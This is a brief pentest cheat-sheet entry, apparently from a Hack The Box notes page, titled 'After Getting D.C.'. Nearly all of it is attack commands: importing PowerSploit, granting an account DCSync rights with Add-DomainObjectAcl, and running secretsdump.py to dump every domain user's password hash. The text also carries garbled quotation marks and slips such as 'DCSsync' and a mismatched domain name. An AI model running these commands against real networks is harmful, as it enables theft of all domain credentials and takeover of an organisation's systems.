After Getting D.C.
If you are a Domain Controller then you can dump all user hashes means proof that whole domain is mine.
windows: Import-Module .\PowerSploit.ps1
windows: AddDomainObjectAcl -PrincipalIdentity DC_username -TargetIdentity âDC=htb,DC=localâ -Rights DCSsync
linux: secretsdump.py âht.local/DC_username:password@$IPâ
Last updated